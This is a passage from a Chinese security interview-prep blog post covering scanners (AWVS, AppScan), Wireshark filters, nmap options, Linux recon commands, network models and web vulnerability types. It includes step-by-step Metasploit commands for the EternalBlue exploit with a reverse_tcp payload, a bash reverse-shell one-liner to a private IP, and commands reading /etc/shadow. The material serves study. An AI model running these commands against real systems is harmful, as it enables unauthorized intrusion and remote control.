<li><p>Acunetix检索并分析网站，包括flash内容，SOAP和AJAX</p>
</li>
<li><p>端口扫描web服务器并对在服务器上运行的网络服务执行安全检查</p>
</li>
<li><p>可到处网站漏洞文件</p>
</li>
</ul>
<h4 id="工作原理"><a href="#工作原理" class="headerlink" title="工作原理"></a>工作原理</h4><ul>
<li><p>扫描整个网络，通过跟踪站点上的所有链接和robots.txt来实现扫描，扫描后AWVS就会映射出站点的结构并显示每个文件的细节信息。</p>
</li>
<li><p>在上述的发现阶段或者扫描过程之后，AWVS就会自动地对所发现的每一个页面发动一系列的漏洞攻击，这实质上是模拟一个黑客的攻击过程（用自定义的脚本去探测是否有漏洞） 。WVS分析每一个页面中需要输入数据的地方，进而尝试3所有的输入组合。这是一个自动扫描阶段 。</p>
</li>
<li><p>在它发现漏洞之后，AWVS就会在“Alerts Node(警告节点)”中报告这些漏洞，每一个警告都包含着漏洞信息和如何修补漏洞的建议。</p>
</li>
<li><p>在一次扫描完成之后，它会将结果保存为文件以备日后分析以及与以前的扫描相比较，使用报告工具，就可以创建一个专业的报告来总结这次扫描。</p>
</li>
</ul>
<h4 id="页面介绍"><a href="#页面介绍" class="headerlink" title="页面介绍"></a>页面介绍</h4><p>主菜单功能介绍：主菜单共有5个模块，分别为Dashboard、Targets、Vulnerabilities、Scans和Reports。</p>
<ul>
<li>Dashboard：仪表盘，显示扫描过的网站的漏洞信息</li>
<li>Targets：目标网站，需要被扫描的网站</li>
<li>Vulnerabilities：漏洞，显示所有被扫描出来的网站漏洞</li>
<li>Scans：扫描目标站点，从Target里面选择目标站点进行扫描</li>
<li>Reports：漏洞扫描完成后生成的报告</li>
</ul>
<p>设置菜单功能介绍：设置菜单共有8个模块，分别为Users、Scan Types、Network Scanner、Issue Trackers、Email Settings、Engines、Excluded Hours、Proxy Settings</p>
<ul>
<li>Users：用户，添加网站的使用者、新增用户身份验证、用户登录会话和锁定设置</li>
<li>Scan Types：扫描类型，可根据需要勾选完全扫描、高风险漏洞、跨站点脚本漏洞、SQL 注入漏洞、弱密码、仅爬网、恶意软件扫描</li>
<li>Network Scanner：网络扫描仪，配置网络信息包括地址、用户名、密码、端口、协议</li>
<li>Issue Trackers：问题跟踪器，可配置问题跟踪平台如github、gitlab、JIRA等</li>
<li>Email Settings：邮件设置，配置邮件发送信息</li>
<li>Engines：引擎，引擎安装删除禁用设置</li>
<li>Excluded Hours：扫描时间设置，可设置空闲时间扫描</li>
<li>Proxy Settings：代理设置，设置代理服务器信息</li>
</ul>
<h3 id="APPSCAN"><a href="#APPSCAN" class="headerlink" title="APPSCAN"></a>APPSCAN</h3><h4 id="介绍-1"><a href="#介绍-1" class="headerlink" title="介绍"></a>介绍</h4><p>AppScan是IBM的一款web安全扫描工具，主要适用于Windows系统。该软件内置强大的扫描引擎，可以测试和评估Web服务和应用程序的风险检查，根据网站入口自动对网页链接进行安全扫描，扫描之后会提供扫描报告和修复建议等。</p>
<h4 id="工作原理-1"><a href="#工作原理-1" class="headerlink" title="工作原理"></a>工作原理</h4><p>1）通过探索了解整个web页面结果</p>
<p>2）通过分析，使用扫描规则库对修改的HTTP Request进行攻击尝试</p>
<p>3）分析 Response 来验证是否存在安全漏洞</p>
<h3 id="wireshark"><a href="#wireshark" class="headerlink" title="wireshark"></a>wireshark</h3><h4 id="软件功能"><a href="#软件功能" class="headerlink" title="软件功能"></a>软件功能</h4><p>1、分析网络底层协议；<br> 2、解决网络故障问题；<br> 3、找寻网络安全问题；</p>
<h4 id="软件原理"><a href="#软件原理" class="headerlink" title="软件原理"></a>软件原理</h4><p>当信息以明文的形式在网络上传输时，便可以使用网络监听的方式来进行攻击。<code>将网络接口设置在监听模式，便可以将网上传输的源源不断的信息截获。</code>嗅探技术常常用于网络故障诊断、协议分析、应用性能分析和网络安全保障等各个领域</p>
<h4 id="过滤"><a href="#过滤" class="headerlink" title="过滤"></a>过滤</h4><h4 id="协议过滤"><a href="#协议过滤" class="headerlink" title="协议过滤"></a>协议过滤</h4><p>tcp，只显示TCP协议的数据包列表<br> http，只查看HTTP协议的数据包列表<br> icmp，只显示ICMP协议的数据包列表</p>
<h4 id="ip过滤"><a href="#ip过滤" class="headerlink" title="ip过滤"></a>ip过滤</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ip.src ==192.168.1.104 显示源地址为192.168.1.104的数据包列表</span><br><span class="line">ip.dst==192.168.1.104, 显示目标地址为192.168.1.104的数据包列表</span><br><span class="line">ip.addr == 192.168.1.104 显示源IP地址或目标IP地址为192.168.1.104的数据包列表</span><br></pre></td></tr></table></figure>

<h4 id="端口过滤"><a href="#端口过滤" class="headerlink" title="端口过滤"></a>端口过滤</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">tcp.port ==80,  显示源主机或者目的主机端口为80的数据包列表。</span><br><span class="line">tcp.srcport == 80,  只显示TCP协议的源主机端口为80的数据包列表。</span><br><span class="line">tcp.dstport == 80，只显示TCP协议的目的主机端口为80的数据包列表。</span><br></pre></td></tr></table></figure>

<h4 id="Http模式过滤"><a href="#Http模式过滤" class="headerlink" title="Http模式过滤"></a>Http模式过滤</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http.request.method==“GET”, 只显示HTTP GET方法的</span><br></pre></td></tr></table></figure>

<h4 id="逻辑运算符为-and-or-not"><a href="#逻辑运算符为-and-or-not" class="headerlink" title="逻辑运算符为 and&#x2F;or&#x2F;not"></a>逻辑运算符为 and&#x2F;or&#x2F;not</h4><p>过滤多个条件组合时，使用and&#x2F;or。比如获取IP地址为192.168.1.104的ICMP数据包表达式为：<code>ip.addr == 192.168.1.104 and icmp</code></p>
<h3 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h3><table>
<thead>
<tr>
<th>参数(注意区分大小写)</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>-sT</td>
<td>TCP connect()扫描，这种方式会在目标主机的日志中记录大批连接请求和错误信息。</td>
</tr>
<tr>
<td>-sS</td>
<td>半开扫描，很少有系统能把它记入系统日志。不过，需要Root权限。</td>
</tr>
<tr>
<td>-sF  -sN</td>
<td>秘密FIN数据包扫描、Xmas Tree、Null扫描模式</td>
</tr>
<tr>
<td>-sP</td>
<td>ping扫描，Nmap在扫描端口时，默认都会使用ping扫描，只有主机存活，Nmap才会继续扫描。</td>
</tr>
<tr>
<td>-sU</td>
<td>UDP扫描，但UDP扫描是不可靠的</td>
</tr>
<tr>
<td>-sA</td>
<td>这项高级的扫描方法通常用来穿过防火墙的规则集</td>
</tr>
<tr>
<td>-sV</td>
<td>探测端口服务版本</td>
</tr>
<tr>
<td>-Pn</td>
<td>扫描之前不需要用ping命令，有些防火墙禁止ping命令。可以使用此选项进行扫描</td>
</tr>
<tr>
<td>-v</td>
<td>显示扫描过程，推荐使用</td>
</tr>
<tr>
<td>-h</td>
<td>帮助选项，是最清楚的帮助文档</td>
</tr>
<tr>
<td>-p</td>
<td>指定端口，如“1-65535、1433、135、22、80”等</td>
</tr>
<tr>
<td>-O</td>
<td>启用远程操作系统检测，存在误报</td>
</tr>
<tr>
<td>-A</td>
<td>全面系统检测、启用脚本检测、扫描等</td>
</tr>
<tr>
<td>-oN&#x2F;-oX&#x2F;-oG</td>
<td>将报告写入文件，分别是正常、XML、grepable 三种格式</td>
</tr>
<tr>
<td>-T4</td>
<td>针对TCP端口禁止动态扫描延迟超过10ms</td>
</tr>
<tr>
<td>-iL</td>
<td>读取主机列表，例如，“-iL C:\ip.txt”</td>
</tr>
</tbody></table>
<p><strong>1、扫描单个目标</strong></p>
<p>nmap ip</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">如：nmap 192.168.0.101</span><br></pre></td></tr></table></figure>

<p><strong>2、扫描多个目标</strong></p>
<p>nmap ip1 ip2 适用于目标地址不再同一个网段或在同一网段不连续且数量不多的情况。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">如：nmap 192.168.0.101 192.168.0.110</span><br></pre></td></tr></table></figure>

<p><strong>3、扫描一个范围内的目标</strong></p>
<p>nmap xxx.xxx.xxx.xxx-xxx</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">如：nmap 192.168.0.100-110</span><br></pre></td></tr></table></figure>

<p><strong>4、扫描目标地址所在某网段</strong></p>
<p>namp xxx.xxx.xxx.xxx&#x2F;xx</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">如：nmap 192.168.0.1/24</span><br></pre></td></tr></table></figure>

<p><strong>5、扫描包含主机列表的文件中的所有地址</strong></p>
<p>nmap -iL <File path></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">如：nmap -iL /root/target.txt</span><br></pre></td></tr></table></figure>

<p><strong>6、扫描除了一个目标地址之外的所有地址</strong></p>
<p>nmap ip段 -exclude 被排除的ip</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">如：nmap 192.168.0.100-110 -exclude 192.168.0.103</span><br><span class="line">   nmap 192.168.0.1/24 -exclude 192.168.0.103 </span><br></pre></td></tr></table></figure>

<p><strong>7、扫描目标地址的指定端口</strong></p>
<p>nmap ip -p 端口1，端口2，端口3……</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">如:nmap 192.168.0.101 -p 80,8080,3306,3389</span><br></pre></td></tr></table></figure>

<p><strong>8、扫描目标地址C段的在线主机</strong></p>
<p>nmap -sP ip段</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">如：nmap -sP 192.168.0.1/24</span><br></pre></td></tr></table></figure>

<p><strong>9、扫描目标地址操作系统版本进行探测</strong></p>
<p>nmap -O ip</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">如：nmap -O 192.168.0.101</span><br></pre></td></tr></table></figure>

<p><strong>10、扫描目标所开放的全部端口（半开式）</strong></p>
<p>nmap -sS -p 端口号(多个用“,”隔开) -v ip</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">如：nmap -sS -p 1-65535 192.168.0.101</span><br></pre></td></tr></table></figure>



<h3 id="MSF"><a href="#MSF" class="headerlink" title="MSF"></a>MSF</h3><h4 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h4><p>Metasploit（MSF）是一个免费的、可下载的框架，通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。</p>
<p>它本身附带数百个已知软件漏洞，<strong>是一款专业级漏洞攻击工具</strong></p>
<h4 id="使用"><a href="#使用" class="headerlink" title="使用"></a>使用</h4><p>根据漏洞名称搜索 : <code>search ms17_010</code></p>
<p>1、运用辅助模块扫描目标</p>
<p>设置模块：<code>use auxiliary/scanner/smb/smb_ms17_010</code></p>
<p>查看设置：<code>options</code> </p>
<p>设置目标地址：<code>set rhosts 192.168.174.129</code></p>
<p>目标端口默认是445，如果用nmap端口扫描windows文件共享服务不是开放在445端口上面，那这里需要进行修改，<code>set rport 目标端口</code></p>
<p>设置好了之后，<code>run</code>或者<code>exploit</code> 进行攻击</p>
<p>2、设置攻击模块对目标进行攻击</p>
<p>使用攻击模块：<code>use exploit/windows/smb/ms17_010_eternalblue</code></p>
<p>查看所需设置：<code>options</code> </p>
<p>设置目标地址：<code>set RHOSTS 192.168.174.129</code></p>
<p>设置目标端口：<code>set RPORT 445</code></p>
<p>设置payload：<code>set payload windows/x64/meterpreter/reverse_tcp</code></p>
<p>设置本地地址：<code>set LHOST 192.168.174.192</code></p>
<p>攻击：<code>run</code>或者<code>exploit</code> </p>
<h3 id="Linux命令"><a href="#Linux命令" class="headerlink" title="Linux命令"></a>Linux命令</h3><p><strong>命令：netstat</strong></p>
<p>用途：查看系统的网络连接状态、路由表、接口统计等信息</p>
<p>格式：netstat [选项]</p>
<p>常用选项：</p>
<ul>
<li>-a：显示所有活动连接</li>
<li>-n：以数字形式显示</li>
<li>-p：显示进程信息</li>
<li>-t：查看TCP协议相关信息</li>
<li>-u：查看UDP协议相关信息</li>
<li>-r：显示路由表信息</li>
</ul>
<p><strong>命令：network</strong></p>
<p>用途：启用、禁用网络接口配置</p>
<p>重启network格式：service network restart</p>
<p><strong>命令：chmod</strong></p>
<p>用途：权限控制命令</p>
<p>Linux系统下文件权限显示如下图所示，第一个数字，数字代表的意义为：</p>
<ul>
<li>– 普通文件</li>
<li>d 目录</li>
<li>s socket套接字</li>
<li>l 软链接</li>
<li>p 管道</li>
<li>c 字符设备</li>
<li>b 块设备</li>
</ul>
<p><code>uname -a</code>: 此命令可以查看当前Linux系统内核具体版本、使用的发行版版本、以及当前处理器架构!(这里的架构非常重要,大部分针对Linux攻击载荷都需要明确处理器架构才能使用)</p>
<p>存放系统信息的文件</p>
<ul>
<li>cat &#x2F;etc&#x2F;issue: 连接系统时显示的提示信息,默认一般会存放发行版名称等信息(PS:用户可能会把这个当成备忘录存放一些口令)</li>
<li>cat &#x2F;etc&#x2F;<em>-release: 详细的发行版系统版本信息(不同的发行版可能名字会略有不同,并且此文件可能有多个,这种情况下我们可以使用通配符</em>来解决这个问题。ls &#x2F;etc | grep “release””可以使用此命令来查看你系统中此文件夹具体有哪些!)</li>
<li>cat &#x2F;proc&#x2F;version: 详细的系统内核信息,用于编译内核的gcc的版本以及内核编译的时间。</li>
<li>cat &#x2F;proc&#x2F;sys&#x2F;kernel&#x2F;version: 系统内核信息,相当uname -v(&#x2F;proc&#x2F;sys&#x2F;kernel文件夹中可以监视和调整Linux内核中的各种活动!但需要管理员权限!)</li>
</ul>
<p>进程信息</p>
<pre><code>ps: 列出本用户当前使用的终端中运行的进程
    ps -elf: 显示详细的(-l)带UID,PPIP,C与STIME栏位(-f)现行终端机下的所有进程(-e)
    ps aux: 已用户为主的格式(u)显示所有用户(a)的所有终端机(x)下的所有进程
top: 类似Windows的任务管理器
</code></pre>
<p><code>cat /etc/passwd</code>: 可以登录系统或其他拥有正在运行的进程的操作系统的用户身份信息</p>
<p><code>cat /etc/shadow</code>: 所有用户的密码安全策略,一般只有超级用户对此文件夹才有访问权限!</p>
<p><code>cat /etc/sudoers</code>: 对权限的分配管理   </p>
<p><code>ifconfig -a</code>: 查看网络、网卡相关信息</p>
<p><code>hostname</code>: 显示、设置系统的主机名称</p>
<h4 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash -i &gt;&amp; /dev/tcp/192.168.0.4/7777 0&gt;&amp;1</span><br></pre></td></tr></table></figure>



<h3 id="OSI模型"><a href="#OSI模型" class="headerlink" title="OSI模型"></a>OSI模型</h3><p><img  
                       lazyload
                       alt="image"
                       data-src="https://cdn.jsdelivr.net/gh/R3damancy1/blog-pic/202404151440002.png"
                        alt="图片-1685330434325"
                 ><strong>应用层：为应用程序或用户请求提供各种请求服务。</strong>OSI参考模型最高层，也是最靠近用户的一层，为计算机用户、各种应用程序以及网络提供接口，也为用户直接提供各种网络服务。</p>
<p><strong>表示层：数据编码、格式转换、数据加密。</strong>提供各种用于应用层数据的编码和转换功能,确保一个系统的应用层发送的数据能被另一个系统的应用层识别。如果必要，该层可提供一种标准表示形式，用于将计算机内部的多种数据格式转换成通信中采用的标准表示形式。数据压缩和加密也是表示层可提供的转换功能之一。</p>
<p><strong>会话层：创建、管理和维护会话。</strong>接收来自传输层的数据，负责建立、管理和终止表示层实体之间的通信会话，支持它们之间的数据交换。该层的通信由不同设备中的应用程序之间的服务请求和响应组成。</p>
<p><strong>传输层：数据通信。</strong>建立主机端到端的链接，为会话层和网络层提供端到端可靠的和透明的数据传输服务，确保数据能完整的传输到网络层。</p>
<p><strong>网络层：IP选址及路由选择。</strong>通过路由选择算法，为报文或通信子网选择最适当的路径。控制数据链路层与传输层之间的信息转发，建立、维持和终止网络的连接。数据链路层的数据在这一层被转换为数据包，然后通过路径选择、分段组合、顺序、进&#x2F;出路由等控制，将信息从一个网络设备传送到另一个网络设备。</p>
<p><strong>数据链路层：提供介质访问和链路管理。</strong>接收来自物理层的位流形式的数据，封装成帧，传送到网络层；将网络层的数据帧，拆装为位流形式的数据转发到物理层；负责建立和管理节点间的链路，通过各种控制协议，将有差错的物理信道变为无差错的、能可靠传输数据帧的数据链路。</p>
<p><strong>物理层：管理通信设备和网络媒体之间的互联互通。</strong>传输介质为数据链路层提供物理连接，实现比特流的透明传输。实现相邻计算机节点之间比特流的透明传送，屏蔽具体传输介质和物理设备的差异。</p>
<h3 id="TCP-IP五层模型"><a href="#TCP-IP五层模型" class="headerlink" title="TCP&#x2F;IP五层模型"></a>TCP&#x2F;IP五层模型</h3><h4 id="区别"><a href="#区别" class="headerlink" title="区别"></a><img  
                       lazyload
                       alt="image"
                       data-src="https://cdn.jsdelivr.net/gh/R3damancy1/blog-pic/202404151440451.png"
                        alt="图片-1685330444867"
                 >区别</h4><p>TCP&#x2F;IP协议中的应用层处理开放式系统互联模型（OSI）中的第五层、第六层和第七层的功能。</p>
<p>TCP&#x2F;IP协议中的传输层不能保证数据包在该层总是能够安全可靠地传输，而开放式系统互联模型（OSI）可以做到。</p>
<p>TCP&#x2F;IP协议还提供一项名为UDP（用户数据报协议）的选择。</p>
<h3 id="xss，csrf，ssrf区别"><a href="#xss，csrf，ssrf区别" class="headerlink" title="xss，csrf，ssrf区别"></a>xss，csrf，ssrf区别</h3><p><strong>相同点：</strong><br> XSS，CSRF,SSRF三种常见的Web服务端漏洞均是由于，服务器端对用户提供的可控数据过于信任或者过滤不严导致的。</p>
<p><strong>不同点：</strong><br> XSS是服务器对用户输入的数据没有进行足够的过滤，导致客户端浏览器在渲染服务器返回的html页面时，出现了预期值之外的脚本语句被执行。</p>
<p>CSRF(跨站请求伪造)是服务器端没有对用户提交的数据进行随机值校验，且对http请求包内的refer字段校验不严，导致攻击者可以利用用户的Cookie信息伪造用户请求发送至服务器。  </p>
<p>SSRF(服务端请求伪造）是服务器对用户提供的可控URL过于信任，没有对攻击者提供的RUL进行地址限制和足够的检测，导致攻击者可以以此为跳板攻击内网或其他服务器</p>

                </div>
                
                        
<div class="post-copyright-info-container border-box">
    <div class="copyright-info-content border-box">
        <div class="copyright-info-top border-box">
            <div class="copyright-post-title border-box text-ellipsis">
                面试prepare
            </div>

            <div class="copyright-post-link border-box text-ellipsis">
                2023/04/06/面试prepare/
            </div>
        </div>

        <div class="copyright-info-bottom border-box">
            <div class="copyright-post-author bottom-item">
                <div class="type">
                    作者
                </div>
                <div class="content">P1taya</div>
            </div>

            <div class="post-time bottom-item">
                <div class="type">
                    发布于
                </div>
                <div class="content">2023-04-06 23:33</div>
            </div>


            <div class="post-license bottom-item">
                <div class="type">
                    许可
                </div>
                <div class="content tooltip" data-tooltip-content="CC BY-NC-SA 4.0">
                    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh-hans" target="_blank">
                        
                            <i class="fa-brands fa-creative-commons"></i>
                            <i class="fa-brands fa-creative-commons-by"></i>
                            <i class="fa-brands fa-creative-commons-nc"></i>
                            <i class="fa-brands fa-creative-commons-sa"></i>
                        
                    </a>
                </div>
            </div>
        </div>

        <i class="copyright-bg fa-solid fa-copyright"></i>
    </div>
    <div class="copy-copyright-info flex-center tooltip" data-tooltip-content="复制版权信息" data-tooltip-offset-y="-2px">
        <i class="fa-solid fa-copy"></i>
    </div>
</div>

                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                    </div>
                    <div>
                        
                    </div>
                </div>

                

                
                    <div class="post-nav border-box">
                        
                            <div class="prev-post">
                                <a class="prev"
                                   rel="prev"
                                   href="/2023/04/12/HW%20prepare/"
                                   title="HW prepare"
                                >
                                    <span class="left arrow-icon flex-center">
                                        <i class="fas fa-chevron-left"></i>
                                    </span>
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">HW prepare</span>
                                        <span class="post-nav-item">上一篇</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                            <div class="next-post">
                                <a class="next"
                                   rel="next"
                                   href="/2023/03/12/NET/"
                                   title=".NET复习"
                                >
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">.NET复习</span>
                                        <span class="post-nav-item">下一篇</span>
                                    </span>
                                    <span class="right arrow-icon flex-center">
                                        <i class="fas fa-chevron-right"></i>
                                    </span>
                                </a>
                            </div>
                        
                    </div>
                

                
                    






                
            </div>
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%9D%A2%E8%AF%95prepare"><span class="nav-text">面试prepare</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-text">前言</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sql%E6%B3%A8%E5%85%A5"><span class="nav-text">sql注入</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E7%9A%84%E5%85%B3%E7%B3%BB%E5%9E%8B%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="nav-text">常见的关系型数据库</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#SQL%E6%B3%A8%E5%85%A5%E6%9C%89%E5%93%AA%E5%87%A0%E7%A7%8D%E6%B3%A8%E5%85%A5%E7%B1%BB%E5%9E%8B%EF%BC%9F"><span class="nav-text">SQL注入有哪几种注入类型？</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#SQL%E6%B3%A8%E5%85%A5%E7%9A%84%E5%8D%B1%E5%AE%B3%E5%8F%8A%E9%98%B2%E5%BE%A1"><span class="nav-text">SQL注入的危害及防御</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#sql%E6%B3%A8%E5%85%A5getshell"><span class="nav-text">sql注入getshell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F"><span class="nav-text">绕过方式</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#xss"><span class="nav-text">xss</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8E%9F%E7%90%86"><span class="nav-text">原理</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%A6%82%E4%BD%95%E9%AA%8C%E8%AF%81%E5%AD%98%E5%9C%A8xss%E6%BC%8F%E6%B4%9E"><span class="nav-text">如何验证存在xss漏洞</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#xss%E6%9C%89%E5%93%AA%E5%87%A0%E7%A7%8D%E7%B1%BB%E5%9E%8B"><span class="nav-text">xss有哪几种类型</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#DOM%E5%9E%8BXSS"><span class="nav-text">DOM型XSS</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%8F%8D%E5%B0%84%E6%80%A7%E5%9E%8BXSS"><span class="nav-text">反射性型XSS</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%AD%98%E5%82%A8%E5%9E%8BXSS"><span class="nav-text">存储型XSS</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#xss%E5%8D%B1%E5%AE%B3"><span class="nav-text">xss危害</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#xss%E4%BF%AE%E5%A4%8D"><span class="nav-text">xss修复</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BB%95%E8%BF%87"><span class="nav-text">绕过</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ssrf"><span class="nav-text">ssrf</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8E%9F%E7%90%86-1"><span class="nav-text">原理</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8D%B1%E5%AE%B3"><span class="nav-text">危害</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E6%96%B9%E5%BC%8F"><span class="nav-text">利用方式</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BB%95%E8%BF%87-1"><span class="nav-text">绕过</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%98%B2%E5%BE%A1%E6%96%B9%E5%BC%8F"><span class="nav-text">防御方式</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0"><span class="nav-text">文件上传</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5"><span class="nav-text">基本概念</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E6%96%B9%E5%BC%8F"><span class="nav-text">文件上传漏洞方式</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BB%95%E8%BF%87-2"><span class="nav-text">绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#htaccess%E6%96%87%E4%BB%B6"><span class="nav-text">.htaccess文件</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#user-ini"><span class="nav-text">.user.ini</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%89%8D%E7%AB%AFjs%E7%BB%95%E8%BF%87"><span class="nav-text">前端js绕过</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E9%BB%91%E7%99%BD%E5%90%8D%E5%8D%95%E7%BB%95%E8%BF%87%E5%8F%AF%E4%BB%A5%E4%B8%8A%E4%BC%A0"><span class="nav-text">黑白名单绕过可以上传</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BF%AE%E6%94%B9content-type-%E6%B7%BB%E5%8A%A0GIF89a%E5%A4%B4"><span class="nav-text">修改content-type,添加GIF89a头</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#csrf"><span class="nav-text">csrf</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8E%9F%E7%90%86-2"><span class="nav-text">原理</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%98%B2%E5%BE%A1"><span class="nav-text">防御</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#XXE"><span class="nav-text">XXE</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sqlmap"><span class="nav-text">sqlmap</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B8%B8%E7%94%A8%E6%8C%87%E4%BB%A4"><span class="nav-text">常用指令</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#AWVS"><span class="nav-text">AWVS</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BB%8B%E7%BB%8D"><span class="nav-text">介绍</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8A%9F%E8%83%BD%E7%89%B9%E7%82%B9"><span class="nav-text">功能特点</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B7%A5%E4%BD%9C%E5%8E%9F%E7%90%86"><span class="nav-text">工作原理</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%A1%B5%E9%9D%A2%E4%BB%8B%E7%BB%8D"><span class="nav-text">页面介绍</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#APPSCAN"><span class="nav-text">APPSCAN</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BB%8B%E7%BB%8D-1"><span class="nav-text">介绍</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B7%A5%E4%BD%9C%E5%8E%9F%E7%90%86-1"><span class="nav-text">工作原理</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#wireshark"><span class="nav-text">wireshark</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%BD%AF%E4%BB%B6%E5%8A%9F%E8%83%BD"><span class="nav-text">软件功能</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%BD%AF%E4%BB%B6%E5%8E%9F%E7%90%86"><span class="nav-text">软件原理</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%BF%87%E6%BB%A4"><span class="nav-text">过滤</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8D%8F%E8%AE%AE%E8%BF%87%E6%BB%A4"><span class="nav-text">协议过滤</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#ip%E8%BF%87%E6%BB%A4"><span class="nav-text">ip过滤</span></a></li><li class="nav-item nav-level-4"><a 